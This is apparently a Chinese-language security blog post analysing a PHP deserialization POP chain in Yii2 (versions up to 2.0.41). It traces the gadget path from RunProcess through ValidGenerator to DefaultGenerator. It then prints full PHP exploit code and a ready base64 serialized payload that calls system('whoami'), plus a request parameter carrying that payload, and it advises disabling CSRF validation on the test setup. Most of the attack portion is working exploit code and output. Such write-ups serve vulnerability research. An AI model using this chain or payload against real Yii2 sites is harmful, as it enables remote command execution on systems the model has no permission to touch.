前言:巩固POP链
影响版本:yii2 version <= 2.0.41
搭建的时候注意出现 Unable to verify your data submission,只需要在对应的控制器下填上public $enableCsrfValidation=false;,关闭CSRF验证即可
翻看了下__destruct,能够利用的好像也就只有RunProcess类了,其他类基本都给设定了__wakeup来限制反序列化
跟进stopProcess函数,如下所示,$this->processes可控,那么也就是$process可控,从而$process->isRunning()可以调用任意类的__call方法
找到一个__call的方法满足我们的需求,ValidGenerator类中的__call方法,可以看到 $this->generator $this->validator $this->maxRetries变量都可以控制,如果$res可以控制的话那么就可以执行命令了
通过这条$res = call_user_func_array([$this->generator, $name], $arguments);,我们再找一个__call方法来返回值给$res那么就可以了,这里找的是DefaultGenerator类
构造EXP:
首先用到的第一个类是RunProcess,命名空间是在CodeceptionExtension中,且$this->processes可控,内容需要放一个ValidGenerator对象,ValidGenerator对象的构造参数也需要控制
namespace CodeceptionExtension;
use FakerValidGenerator;
class RunProcess{
private $processes = [];
function __construct($command,$argv)
{
$this->processes[] = new ValidGenerator($command,$argv);
}
}
第二个则是ValidGenerator,DefaultGenerator类,该类的命名空间处于Faker中,且其中的三个属性都需要控制,$this->generator需要DefaultGenerator类的对象,DefaultGenerator对象的构造参数为要执行的命令
namespace Faker;
class DefaultGenerator{
protected $default ;
function __construct($argv)
{
$this->default = $argv;
}
}
class ValidGenerator{
protected $generator;
protected $validator;
protected $maxRetries;
function __construct($command,$argv)
{
$this->generator = new DefaultGenerator($argv);
$this->validator = $command;
$this->maxRetries = 99999999;
}
}
最终的EXP如下:
<?php
namespace Faker;
class DefaultGenerator{
protected $default ;
function __construct($argv)
{
$this->default = $argv;
}
}
class ValidGenerator{
protected $generator;
protected $validator;
protected $maxRetries;
function __construct($command,$argv)
{
$this->generator = new DefaultGenerator($argv);
$this->validator = $command;
$this->maxRetries = 99999999;
}
}
namespace CodeceptionExtension;
use FakerValidGenerator;
class RunProcess{
private $processes = [];
function __construct($command,$argv)
{
$this->processes[] = new ValidGenerator($command,$argv);
}
}
$exp = new RunProcess('system','whoami');
echo(base64_encode(serialize($exp)));
//TzozMjoiQ29kZWNlcHRpb25cRXh0ZW5zaW9uXFJ1blByb2Nlc3MiOjE6e3M6NDM6IgBDb2RlY2VwdGlvblxFeHRlbnNpb25cUnVuUHJvY2VzcwBwcm9jZXNzZXMiO2E6MTp7aTowO086MjA6IkZha2VyXFZhbGlkR2VuZXJhdG9yIjozOntzOjEyOiIAKgBnZW5lcmF0b3IiO086MjI6IkZha2VyXERlZmF1bHRHZW5lcmF0b3IiOjE6e3M6MTA6IgAqAGRlZmF1bHQiO3M6Njoid2hvYW1pIjt9czoxMjoiACoAdmFsaWRhdG9yIjtzOjY6InN5c3RlbSI7czoxMzoiACoAbWF4UmV0cmllcyI7aTo5OTk5OTk5OTt9fX0=
这条POP链比较简单,如下分析:
code=TzozMjoiQ29kZWNlcHRpb25cRXh0ZW5zaW9uXFJ1blByb2Nlc3MiOjE6e3M6NDM6IgBDb2RlY2VwdGlvblxFeHRlbnNpb25cUnVuUHJvY2VzcwBwcm9jZXNzZXMiO2E6MTp7aTowO086MjA6IkZha2VyXFZhbGlkR2VuZXJhdG9yIjozOntzOjEyOiIAKgBnZW5lcmF0b3IiO086MjI6IkZha2VyXERlZmF1bHRHZW5lcmF0b3IiOjE6e3M6MTA6IgAqAGRlZmF1bHQiO3M6Njoid2hvYW1pIjt9czoxMjoiACoAdmFsaWRhdG9yIjtzOjY6InN5c3RlbSI7czoxMzoiACoAbWF4UmV0cmllcyI7aTo5OTk5OTk5OTt9fX0=
分析到这不由得叹息大佬们还是厉害得,自己去把yii2框架的wakeup和destruct看了下,感觉基本没有可以利用的了,不知道之后会不会再有。。